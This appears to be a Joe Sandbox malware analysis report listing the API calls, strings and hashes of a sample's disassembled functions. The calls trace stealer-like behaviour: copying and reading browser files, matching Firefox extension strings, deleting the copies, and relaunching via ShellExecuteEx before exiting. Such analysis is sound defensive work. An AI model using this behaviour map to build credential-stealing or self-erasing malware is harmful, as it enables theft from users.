                      • Opcode ID: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                      • Instruction ID: 44da19f5691adabab4a92841ebf23e0a05b67f61296a9f6f4e907ebc84b4e353
                      • Opcode Fuzzy Hash: 82266bfdd90354e846418a99e827ba5feeba1708c4c917e9cb387fe0226bacf2
                      • Instruction Fuzzy Hash: A5F09032A847289BE731BFA8988275D33A0AF00768F10017AD414AB1F0FB247540DBDA
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,0251CFB0), ref: 0041079A
                      • StrCmpCA.SHLWAPI(00000000,0251CF30), ref: 00410866
                      • StrCmpCA.SHLWAPI(00000000,0251CEE0), ref: 0041099D
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: `_A
                      • API String ID: 3722407311-2339250863
                      • Opcode ID: a4eb3da5a924645b2c23a75a8f99fd9a727f27dd9b3a9bf5a15345822e71452f
                      • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                      • Opcode Fuzzy Hash: a4eb3da5a924645b2c23a75a8f99fd9a727f27dd9b3a9bf5a15345822e71452f
                      • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,0251CFB0), ref: 0041079A
                      • StrCmpCA.SHLWAPI(00000000,0251CF30), ref: 00410866
                      • StrCmpCA.SHLWAPI(00000000,0251CEE0), ref: 0041099D
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: `_A
                      • API String ID: 3722407311-2339250863
                      • Opcode ID: 463d45c01749aa26bcf9cda368633a400639f72e2e25e1c4d7590b0e1ec34fdf
                      • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                      • Opcode Fuzzy Hash: 463d45c01749aa26bcf9cda368633a400639f72e2e25e1c4d7590b0e1ec34fdf
                      • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                      • ExitProcess.KERNEL32 ref: 00416755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                      • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                      • Opcode Fuzzy Hash: b4cd0edc391b5ae1f7ca76f0c70161f1b78b8fd1119a06bee71e5bdfafbbf1ad
                      • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 041168CA
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0411698D
                      • ExitProcess.KERNEL32 ref: 041169BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                      • Instruction ID: c013ef6d0c5b839f92e37647fdb6ec765517c1a01d29bf17e1ab31f18f9019c3
                      • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                      • Instruction Fuzzy Hash: F1316DF1901208ABEB14EB90DDD4FDEBB78AF44304F4041A9E209A61A0DF747B88CF59
                      APIs
                      • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: @Jn@$Jn@$Jn@
                      • API String ID: 544645111-1180188686
                      • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                      • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                      • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                      • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                      APIs
                      • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • lstrcatA.KERNEL32(00000000), ref: 0041A982
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcatlstrcpy
                      • String ID: vI@$vI@
                      • API String ID: 3905823039-1245421781
                      • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                      • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                      • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                      • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                      • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                      • wsprintfW.USER32 ref: 00418D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocProcesswsprintf
                      • String ID: %hs
                      • API String ID: 659108358-2783943728
                      • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                      • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                      • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                      • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                      • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                      • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                      • String ID:
                      • API String ID: 257331557-0
                      • Opcode ID: 5f75cb49071d8ddf52f1e805cca9feabbcb80e2292fa4d952445a74a330fc065
                      • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                      • Opcode Fuzzy Hash: 5f75cb49071d8ddf52f1e805cca9feabbcb80e2292fa4d952445a74a330fc065
                      • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0410A548
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0410A666
                      • lstrlen.KERNEL32(00000000), ref: 0410A923
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 0410A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0410A094
                      • DeleteFileA.KERNEL32(00000000), ref: 0410A9AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                      • String ID:
                      • API String ID: 257331557-0
                      • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                      • Instruction ID: 5000b2d284f474071a54446e252245729bfee8f8edff4d219f9853d51ec6ba21
                      • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                      • Instruction Fuzzy Hash: 59E122729112489BDB08FBA4EDD0EEE7B39AF54244F508169E11A720B0EF707B48CF65
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                      • lstrlenA.KERNEL32(00000000), ref: 0040D698
                      • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 276452fec2cc8d6075b4d7ecc856632d0961b2952e97d250c0cf39d51897e32a
                      • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                      • Opcode Fuzzy Hash: 276452fec2cc8d6075b4d7ecc856632d0961b2952e97d250c0cf39d51897e32a
                      • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0410D6E8
                      • lstrlen.KERNEL32(00000000), ref: 0410D8FF
                      • lstrlen.KERNEL32(00000000), ref: 0410D913
                      • DeleteFileA.KERNEL32(00000000), ref: 0410D992
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                      • Instruction ID: 3784dee68d4bdb4782fc84c1a8256e9d23018b4223e3a8b5e06b3f32d4150165
                      • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                      • Instruction Fuzzy Hash: B4910172911108ABDB18FBA4EDD4EEE7B39AF54248F504179E10A620A0EF747B48CF65
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02519360,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                      • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                      • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: f8f7834e18457901e4eb6a07c3f4a2b1639817423d1fc9581feaabc495183ad9
                      • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                      • Opcode Fuzzy Hash: f8f7834e18457901e4eb6a07c3f4a2b1639817423d1fc9581feaabc495183ad9
                      • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                        • Part of subcall function 04118DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,04101660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 04118DED
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0410DA68
                      • lstrlen.KERNEL32(00000000), ref: 0410DC06
                      • lstrlen.KERNEL32(00000000), ref: 0410DC1A
                      • DeleteFileA.KERNEL32(00000000), ref: 0410DC99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                      • Instruction ID: caedf2a9093f7751df0024be3d071ba38a68c193cbb720792d7d0c673ff70331
                      • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                      • Instruction Fuzzy Hash: 4081F071911218ABDF08FBA4EDD4DEE7B39AF54248F40457DE00AA20A0EF747A48CB61
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                      • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: f27249f5c8c904a2793f756fb78abe176cb3c122901a1ff642f22b03aaf17682
                      • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                      • Opcode Fuzzy Hash: f27249f5c8c904a2793f756fb78abe176cb3c122901a1ff642f22b03aaf17682
                      • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                      APIs
                      • memset.MSVCRT ref: 004194EB
                        • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                        • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
